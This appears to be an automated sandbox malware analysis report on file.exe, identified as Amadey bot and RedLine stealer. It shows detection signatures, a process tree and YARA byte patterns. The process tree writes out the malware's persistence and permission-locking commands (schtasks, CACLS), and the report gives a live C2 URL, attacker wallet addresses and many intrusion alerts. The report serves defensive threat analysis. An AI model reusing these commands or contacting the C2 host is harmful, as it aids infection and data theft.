Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 802001
MD5: 392470d5b5723c386b943751c15721a6
SHA1: 83491316d575cc2a867224532fe25e016d8c3f43
SHA256: fd0d72d174c13185267e7e38ac8faf1e5b646e5852645e83dcc12a028214a707
Tags: exe
Infos:

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5152 cmdline: C:\Users\user\Desktop\file.exe MD5: 392470D5B5723C386B943751C15721A6)
    • bmMg.exe (PID: 5132 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe MD5: 03D901B08C7DE9A3C6323A8C6DF73569)
      • amMl.exe (PID: 2508 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe MD5: AD3805672C5FE617D88DCE7E50E56B9F)
      • nika.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 588 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 4184 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 5256 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6092 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 64 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 760 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 2056 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 4124 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 4900 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 3924 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 3420 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 1536 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 664 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4556 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 1116 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 3232 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4928 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
00000010.00000000.402656135.0000000000831000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0000001F.00000002.519184660.0000000000831000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0000001F.00000000.518847759.0000000000831000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000023.00000002.646081844.0000000000831000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
2.2.amMl.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
2.2.amMl.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
                        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                        • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                        • 0x1e9d0:$s5: delete[]
                        • 0x1de88:$s6: constructor or from DllMain.
2.2.amMl.exe.5b0e67.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
2.2.amMl.exe.5b0e67.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
                          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                          • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                          • 0x1e9d0:$s5: delete[]
                          • 0x1de88:$s6: constructor or from DllMain.
31.2.mnolyk.exe.830000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

No Sigma rule has matched

Timestamp: 02/08/23-21:32:21.545353
Source IP: 192.168.2.3
Destination IP: 62.204.41.4
SID: 2027700
Source Port: 49933
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449740802027700 02/08/23-21:31:26.105437
                            SID:2027700
                            Source Port:49740
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449835802027700 02/08/23-21:31:52.859571
                            SID:2027700
                            Source Port:49835
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449737802027700 02/08/23-21:31:25.346205
                            SID:2027700
                            Source Port:49737
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449798802027700 02/08/23-21:31:43.430750
                            SID:2027700
                            Source Port:49798
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449896802027700 02/08/23-21:32:09.795235
                            SID:2027700
                            Source Port:49896
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449948802027700 02/08/23-21:32:25.249770
                            SID:2027700
                            Source Port:49948
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449755802027700 02/08/23-21:31:29.861684
                            SID:2027700
                            Source Port:49755
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449820802027700 02/08/23-21:31:48.811905
                            SID:2027700
                            Source Port:49820
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449709802027700 02/08/23-21:31:11.416191
                            SID:2027700
                            Source Port:49709
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449807802027700 02/08/23-21:31:45.583489
                            SID:2027700
                            Source Port:49807
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449783802027700 02/08/23-21:31:39.747318
                            SID:2027700
                            Source Port:49783
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449868802027700 02/08/23-21:32:03.033763
                            SID:2027700
                            Source Port:49868
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449881802027700 02/08/23-21:32:06.188564
                            SID:2027700
                            Source Port:49881
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449863802027700 02/08/23-21:32:01.828272
                            SID:2027700
                            Source Port:49863
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449712802027700 02/08/23-21:31:12.121654
                            SID:2027700
                            Source Port:49712
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449810802027700 02/08/23-21:31:46.341949
                            SID:2027700
                            Source Port:49810
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449905802027700 02/08/23-21:32:12.384320
                            SID:2027700
                            Source Port:49905
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449961802027700 02/08/23-21:32:28.958110
                            SID:2027700
                            Source Port:49961
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449966802027700 02/08/23-21:32:30.274782
                            SID:2027700
                            Source Port:49966
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449765802027700 02/08/23-21:31:32.555336
                            SID:2027700
                            Source Port:49765
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449788802027700 02/08/23-21:31:40.954036
                            SID:2027700
                            Source Port:49788
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449727802027700 02/08/23-21:31:22.887483
                            SID:2027700
                            Source Port:49727
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449923802027700 02/08/23-21:32:19.023556
                            SID:2027700
                            Source Port:49923
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449958802027700 02/08/23-21:32:28.145173
                            SID:2027700
                            Source Port:49958
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449704802027700 02/08/23-21:31:10.105007
                            SID:2027700
                            Source Port:49704
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449830802027700 02/08/23-21:31:51.265355
                            SID:2027700
                            Source Port:49830
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449900802027700 02/08/23-21:32:10.776959
                            SID:2027700
                            Source Port:49900
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449745802027700 02/08/23-21:31:27.438465
                            SID:2027700
                            Source Port:49745
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449871802027700 02/08/23-21:32:03.779795
                            SID:2027700
                            Source Port:49871
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449817802027700 02/08/23-21:31:48.055582
                            SID:2027700
                            Source Port:49817
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449722802027700 02/08/23-21:31:17.801755
                            SID:2027700
                            Source Port:49722
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449793802027700 02/08/23-21:31:42.202189
                            SID:2027700
                            Source Port:49793
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449853802027700 02/08/23-21:31:59.419398
                            SID:2027700
                            Source Port:49853
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449775802027700 02/08/23-21:31:37.801160
                            SID:2027700
                            Source Port:49775
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449800802027700 02/08/23-21:31:43.904291
                            SID:2027700
                            Source Port:49800
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449858802027700 02/08/23-21:32:00.606919
                            SID:2027700
                            Source Port:49858
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449778802027700 02/08/23-21:31:38.510712
                            SID:2027700
                            Source Port:49778
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449809802027700 02/08/23-21:31:46.106372
                            SID:2027700
                            Source Port:49809
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449907802027700 02/08/23-21:32:13.917744
                            SID:2027700
                            Source Port:49907
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449876802027700 02/08/23-21:32:04.982215
                            SID:2027700
                            Source Port:49876
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449910802027700 02/08/23-21:32:15.871067
                            SID:2027700
                            Source Port:49910
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449760802027700 02/08/23-21:31:31.042505
                            SID:2027700
                            Source Port:49760
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449815802027700 02/08/23-21:31:47.530708
                            SID:2027700
                            Source Port:49815
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449913802027700 02/08/23-21:32:16.595552
                            SID:2027700
                            Source Port:49913
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449735802027700 02/08/23-21:31:24.825436
                            SID:2027700
                            Source Port:49735
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449928802027700 02/08/23-21:32:20.315211
                            SID:2027700
                            Source Port:49928
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449729802027700 02/08/23-21:31:23.382592
                            SID:2027700
                            Source Port:49729
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449840802027700 02/08/23-21:31:56.252732
                            SID:2027700
                            Source Port:49840
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449943802027700 02/08/23-21:32:24.007317
                            SID:2027700
                            Source Port:49943
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449845802027700 02/08/23-21:31:57.496565
                            SID:2027700
                            Source Port:49845
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449730802027700 02/08/23-21:31:23.623024
                            SID:2027700
                            Source Port:49730
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449886802027700 02/08/23-21:32:07.408944
                            SID:2027700
                            Source Port:49886
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449851802027700 02/08/23-21:31:58.949710
                            SID:2027700
                            Source Port:49851
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449724802027700 02/08/23-21:31:22.157497
                            SID:2027700
                            Source Port:49724
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449848802027700 02/08/23-21:31:58.209736
                            SID:2027700
                            Source Port:49848
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449802802027700 02/08/23-21:31:44.378402
                            SID:2027700
                            Source Port:49802
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449904802027700 02/08/23-21:32:12.046729
                            SID:2027700
                            Source Port:49904
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449711802027700 02/08/23-21:31:11.882854
                            SID:2027700
                            Source Port:49711
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449867802027700 02/08/23-21:32:02.794106
                            SID:2027700
                            Source Port:49867
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449864802027700 02/08/23-21:32:02.060206
                            SID:2027700
                            Source Port:49864
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449962802027700 02/08/23-21:32:29.257081
                            SID:2027700
                            Source Port:49962
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449705802027700 02/08/23-21:31:10.447077
                            SID:2027700
                            Source Port:49705
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449818802027700 02/08/23-21:31:48.341113
                            SID:2027700
                            Source Port:49818
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449959802027700 02/08/23-21:32:28.422447
                            SID:2027700
                            Source Port:49959
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449870802027700 02/08/23-21:32:03.546238
                            SID:2027700
                            Source Port:49870
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449726802027700 02/08/23-21:31:22.634931
                            SID:2027700
                            Source Port:49726
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449821802027700 02/08/23-21:31:49.045771
                            SID:2027700
                            Source Port:49821
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449824802027700 02/08/23-21:31:49.780553
                            SID:2027700
                            Source Port:49824
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449754802027700 02/08/23-21:31:29.621347
                            SID:2027700
                            Source Port:49754
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449751802027700 02/08/23-21:31:28.918585
                            SID:2027700
                            Source Port:49751
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449895802027700 02/08/23-21:32:09.563402
                            SID:2027700
                            Source Port:49895
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449934802027700 02/08/23-21:32:21.786854
                            SID:2027700
                            Source Port:49934
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449937802027700 02/08/23-21:32:22.552019
                            SID:2027700
                            Source Port:49937
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449892802027700 02/08/23-21:32:08.821841
                            SID:2027700
                            Source Port:49892
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449839802027700 02/08/23-21:31:55.963337
                            SID:2027700
                            Source Port:49839
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449797802027700 02/08/23-21:31:43.170405
                            SID:2027700
                            Source Port:49797
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449854802027700 02/08/23-21:31:59.659125
                            SID:2027700
                            Source Port:49854
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449721802027700 02/08/23-21:31:17.546135
                            SID:2027700
                            Source Port:49721
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449940802027700 02/08/23-21:32:23.296032
                            SID:2027700
                            Source Port:49940
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449889802027700 02/08/23-21:32:08.107631
                            SID:2027700
                            Source Port:49889
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449718802027700 02/08/23-21:31:15.921504
                            SID:2027700
                            Source Port:49718
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449759802027700 02/08/23-21:31:30.808118
                            SID:2027700
                            Source Port:49759
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449932802027700 02/08/23-21:32:21.312523
                            SID:2027700
                            Source Port:49932
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449926802027700 02/08/23-21:32:19.767739
                            SID:2027700
                            Source Port:49926
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449713802027700 02/08/23-21:31:12.783643
                            SID:2027700
                            Source Port:49713
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449897802027700 02/08/23-21:32:10.032773
                            SID:2027700
                            Source Port:49897
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449967802027700 02/08/23-21:32:30.528686
                            SID:2027700
                            Source Port:49967
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449790802027700 02/08/23-21:31:41.465182
                            SID:2027700
                            Source Port:49790
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449862802027700 02/08/23-21:32:01.593618
                            SID:2027700
                            Source Port:49862
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449789802027700 02/08/23-21:31:41.224340
                            SID:2027700
                            Source Port:49789
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449748802027700 02/08/23-21:31:28.171578
                            SID:2027700
                            Source Port:49748
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449784802027700 02/08/23-21:31:39.982751
                            SID:2027700
                            Source Port:49784
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449826802027700 02/08/23-21:31:50.292455
                            SID:2027700
                            Source Port:49826
                            Destination Port:80
                            Protocol:TCP
